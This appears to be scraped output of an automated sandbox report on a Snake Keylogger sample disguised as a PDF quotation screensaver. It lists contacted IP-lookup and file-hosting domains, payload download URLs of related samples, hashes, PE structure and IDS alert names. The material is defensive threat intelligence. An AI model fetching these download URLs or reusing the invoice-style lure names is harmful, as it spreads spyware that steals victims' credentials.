                                        https://stackoverflow.com/q/11564914/23354;QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/2152978/23354QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.org/qaspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmpfalse
                                              high
                                              http://reallyfreegeoip.orgaspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FAB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://filetransfer.ioQUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/mgravell/protobuf-netQUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196EEAE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2650304979.000001196ECC7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638444534.000001195D1A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    high
                                                    https://reallyfreegeoip.orgaspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FAE0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgaspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://checkip.dyndns.comaspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB32000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FBB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB70000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB5D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://filetransfer.ioQUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EBA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59F981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://s24.filetransfer.ioQUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195EC14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://reallyfreegeoip.org/xml/aspnet_compiler.exe, 00000004.00000002.3322004150.000001F5AF989000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319624871.000001F59E080000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3319881103.000001F59FA92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                188.114.97.3
                                                                reallyfreegeoip.orgEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                188.114.96.3
                                                                s24.filetransfer.ioEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                193.122.130.0
                                                                checkip.dyndns.comUnited States
                                                                31898ORACLE-BMC-31898USfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1560140
                                                                Start date and time:2024-11-21 13:07:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 22s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:6
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:QUOTATION_NOVQTRA071244PDF.scr.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@4/0@4/3
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 70%
                                                                • Number of executed functions: 110
                                                                • Number of non-executed functions: 1
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
                                                                TimeTypeDescription
                                                                07:07:58API Interceptor93164x Sleep call for process: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe modified
                                                                07:09:01API Interceptor8767x Sleep call for process: aspnet_compiler.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                • www.rgenerousrs.store/o362/
                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                • www.beylikduzu616161.xyz/2nga/
                                                                Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                ce.vbsGet hashmaliciousUnknownBrowse
                                                                • paste.ee/d/lxvbq
                                                                Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                • www.ssrnoremt-rise.sbs/3jsc/
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • filetransfer.io/data-package/zWkbOqX7/download
                                                                http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                • kklk16.bsyo45ksda.top/favicon.ico
                                                                gusetup.exeGet hashmaliciousUnknownBrowse
                                                                • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                • gmtagency.online/api/check
                                                                188.114.96.3CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                • www.mffnow.info/1a34/
                                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                • www.mydreamdeal.click/1ag2/
                                                                SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                • www.questmatch.pro/ipd6/
                                                                QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • filetransfer.io/data-package/I7fmQg9d/download
                                                                need quotations.exeGet hashmaliciousFormBookBrowse
                                                                • www.rtpwslot888gol.sbs/jmkz/
                                                                QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                • kklk16.bsyo45ksda.top/favicon.ico
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                • filetransfer.io/data-package/XrlEIxYp/download
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                • filetransfer.io/data-package/XrlEIxYp/download
                                                                QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • filetransfer.io/data-package/7pdXjNKP/download
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                reallyfreegeoip.orgCONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                New_Order_PO-NG57283H9.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 188.114.96.3
                                                                Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                z1MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                • 104.21.67.152
                                                                REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                • 104.21.67.152
                                                                STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                • 172.67.177.134
                                                                s24.filetransfer.ioQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scrGet hashmaliciousFormBookBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_SEPQTRA071244#U00faPDF.scrGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                filetransfer.ioQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                rPO3799039985.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                • 172.67.200.96
                                                                QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSMV BBG MUARA Ship's Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                • 188.114.96.3
                                                                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                • 104.17.25.14
                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 1.1.1.1
                                                                CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                CLOUDFLARENETUSMV BBG MUARA Ship's Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                • 188.114.96.3
                                                                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htmGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                • 104.17.25.14
                                                                phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                • 1.1.1.1
                                                                CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                ORACLE-BMC-31898USRequest for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 193.122.6.168
                                                                PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                • 193.122.130.0
                                                                New_Order_PO-NG57283H9.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 193.122.6.168
                                                                ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 158.101.44.242
                                                                http://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=SepGet hashmaliciousUnknownBrowse
                                                                • 147.154.51.84
                                                                Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 193.122.130.0
                                                                GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                • 193.122.6.168
                                                                Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                • 158.101.44.242
                                                                FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 158.101.44.242
                                                                #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 193.122.130.0
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                54328bd36c14bd82ddaa0c04b25ed9adCONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                New_Order_PO-NG57283H9.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 188.114.97.3
                                                                Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                z1MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • 188.114.97.3
                                                                ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.97.3
                                                                Benefit Enrollment -16oy1xb.pdfGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                • 188.114.97.3
                                                                REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.97.3
                                                                3b5074b1b5d032e5620f69f9f700ff0eMV BBG MUARA Ship's Particulars.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 188.114.96.3
                                                                PO#83298373729383838392387373873PDF.exeGet hashmaliciousQuasarBrowse
                                                                • 188.114.96.3
                                                                CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.96.3
                                                                https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                                • 188.114.96.3
                                                                Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 188.114.96.3
                                                                PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                • 188.114.96.3
                                                                CHARIKLIA JUNIOR DETAILS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 188.114.96.3
                                                                Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 188.114.96.3
                                                                No context
                                                                No created / dropped files found
                                                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):3.2964051773154184
                                                                TrID:
                                                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                • Win64 Executable GUI (202006/5) 46.43%
                                                                • Win64 Executable (generic) (12005/4) 2.76%
                                                                • Generic Win/DOS Executable (2004/3) 0.46%
                                                                • DOS Executable Generic (2002/1) 0.46%
                                                                File name:QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe
                                                                File size:413'696 bytes
                                                                MD5:c62fb9bd9189ed019db81d5cec1ee11b
                                                                SHA1:1eda85cc204de90b33edddb1d8dfdf59a3dae847
                                                                SHA256:9c891264b004f469657e84658ba1d82d2365d9a76cfe7e18cefb2a8e0ccdb1a3
                                                                SHA512:99d1691a5c87237bc6faafe3ffd2f6a7e45c65805d5f527db62d4c3da0e4255c9924a1b47ecde11aff00f8dfbbf89de43f81ce650dbce114cf38bf437455be83
                                                                SSDEEP:1536:/v12J7YRB+RdtZTQj+AcC0VFQVQsjY30+NNU3PDQ7qPpqOLy0uyL+f1:129seA1Y3h6EYuyA
                                                                TLSH:4494941932B49636DE09CAB454F14D10D7E7AE582BE2D35A29C4B66D2F323BD4F036C2
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....>g.........."......2............... ....@...... ....................................`...@......@............... .....
                                                                Icon Hash:0e3333b0bbb3b035
                                                                Entrypoint:0x400000
                                                                Entrypoint Section:
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x673EE4A5 [Thu Nov 21 07:43:33 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:
                                                                Instruction
                                                                dec ebp
                                                                pop edx
                                                                nop
                                                                add byte ptr [ebx], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax+eax], al
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x51a46.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x130ac0x132000159f8cdf79fe6ab36bd0fac791a95f6False0.42980238970588236data5.831334411535666IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x160000x51a460x51c002842f76719f4e687f2fd793537f0b08eFalse0.07124725248470948data2.3501488134684356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x163700x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7601351351351351
                                                                RT_ICON0x164980x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.7155963302752294
                                                                RT_ICON0x168000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6826241134751773
                                                                RT_ICON0x16c680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5389784946236559
                                                                RT_ICON0x16f500xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.470679012345679
                                                                RT_ICON0x17bf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4378517823639775
                                                                RT_ICON0x18ca00x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.36402439024390243
                                                                RT_ICON0x193080x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.33110687022900764
                                                                RT_ICON0x1afb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.30881742738589213
                                                                RT_ICON0x1d5580xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.2924174174174174
                                                                RT_ICON0x1dfc00x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.26580996884735203
                                                                RT_ICON0x211e80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.24244213509683515
                                                                RT_ICON0x254100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.014139568600763382
                                                                RT_GROUP_ICON0x674380xbcdata0.5797872340425532
                                                                RT_VERSION0x674f40x368data0.41628440366972475
                                                                RT_MANIFEST0x6785c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-21T13:08:58.651241+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549806193.122.130.080TCP
                                                                2024-11-21T13:09:02.088850+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549806193.122.130.080TCP
                                                                2024-11-21T13:09:03.727519+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549822188.114.97.3443TCP
                                                                2024-11-21T13:09:05.088823+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549825193.122.130.080TCP
                                                                2024-11-21T13:09:06.755451+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549829188.114.97.3443TCP
                                                                2024-11-21T13:09:18.683967+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549862188.114.97.3443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
